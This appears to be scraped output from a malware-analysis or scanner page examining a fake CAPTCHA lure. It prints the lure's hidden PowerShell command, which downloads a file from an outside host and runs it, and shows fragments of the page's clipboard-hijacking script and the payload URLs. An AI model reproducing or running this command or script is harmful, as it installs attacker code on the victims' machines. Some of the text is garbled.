command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

Showing top 20 malicious sites. 30 additional sites detected.